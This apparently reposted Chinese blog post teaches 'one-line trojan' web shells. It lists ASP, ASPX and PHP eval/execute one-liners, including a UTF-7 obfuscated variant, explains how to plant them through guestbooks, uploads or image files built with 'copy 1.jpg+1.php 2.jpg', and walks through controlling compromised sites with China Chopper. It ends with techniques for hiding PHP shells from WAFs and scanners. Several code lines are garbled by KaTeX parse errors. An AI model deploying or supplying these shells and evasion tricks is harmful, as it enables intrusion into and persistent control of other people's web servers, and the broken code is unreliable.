一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
常用一句话木马
asp一句话木马:
<%execute(request(“value”))%>
php一句话木马:
aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
其他一句话木马:
<%eval request(“value”)%>
<%execute request(“value”)%>
<%execute(request(“value”))%>
<%If Request(“value”)<>"" Then Execute(Request(“value”))%>
<%if request (“value”)<>"“then session(“value”)=request(“value”):end if:if session(“value”)<>”" then execute session(“value”)%>
不用双引号的一句话木马:
<%eval request(chr(35))%>
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
客户端:
一句话最常用的客户端为:
一句话客户端增强版
中国菜刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
使用方法:
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库,或者加进asp网页.
记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式!
然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。
木马原理:
首先 < SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form(’#’)+’‘这句代码,Request.form(’#’)的作用是读取客户端文件中html标记属性中name值被命名 为#的部分。
关于错误:
服务器错误
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line:execute request(“nettoo”)
Description:类型不匹配: ‘execute’
解决方法:
用"eval"替换掉"execute"服务端,就不会出错了。
中国菜刀与一句话木马
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
我们可以把一句话木马插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。
打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。
编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑。
在URL列表中选中目标网站,点击鼠标右键,选择“文件管理”,可以看到网站的目录结构。
图片一句话制作
如果网站限制了上传类型,.asp,.php上传不上出,但是可以上传图片,那么就可以使用图片隐写术将一句话木马安插在图片里,具体操作步骤是:
首先准备好一张图片,一个一句话木马,以及同路径下的dos窗口
然后输入DOS命令:copy 1.jpg+1.php 2.jpg
此时产生的2.jpg就是我们要的图片一句话木马。
其他类型的一句话木马也是一样的使用方法。当然,一般网站不可能这么容易就上传,肯定有防护机制,比方说安全狗防护。
PHP一句话过狗、卫士、D盾等免杀思路!
1.关键字拆分。
比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法
2.可变变量、引用、可变函数。
可变变量 比如 a = a= a=_POST[‘x’]; b = ’ a ’ ; @ e v a l ( b=’a’;@eval( b=’a’;@eval($b);
测试结果:
这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!
引用 比如 a = a= a=_POST[‘x’];KaTeX parse error: Expected 'EOF', got '&' at position 3: b=&̲a;@eval($b);
可变函数 比如 a = ’ a ’ . ’ s s ’ . ’ e ’ . ’ r ’ . ’ t ’ ; a=’a’.’ss’.’e’.’r’.’t’; a=’a’.’ss’.’e’.’r’.’t’;a($_POST[‘x’]);
3.添加其他代码。
添加其他代码 比如 if(empty($a))
{
a = a= a=_POST[‘x’];
}
@eval($a);
测试结果:
4.函数替换。
使用其他函数,比如eval可以使用assert替换。
总结:这种方法适合eval函数被禁用时使用哦
5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …一个名为test的函数,并使用a接受参数
eval(KaTeX parse error: Expected 'EOF', got '}' at position 12: a); }̲ test(_POST[‘x’]);
6.函数回调。
使用其他函数进行调用,并执行。
如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
测试结果:
这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦
7.利用各种方法的特性写出过WAF的一句话。
function test(KaTeX parse error: Expected '}', got 'EOF' at end of input: …封装函数 if (empty(a)){ //利用所学的添加其他代码
KaTeX parse error: Expected 'EOF', got '}' at position 48: …/使用这句代码扰乱D盾的判断 }̲ @eval(a);
}
@test($_POST[‘x’]);
?>
转载请注明: 转载自Legend‘s BLog
本文链接地址:
http://www.legendsec.org/1701.html
PHP一句话过狗、卫士、D盾等免杀思路!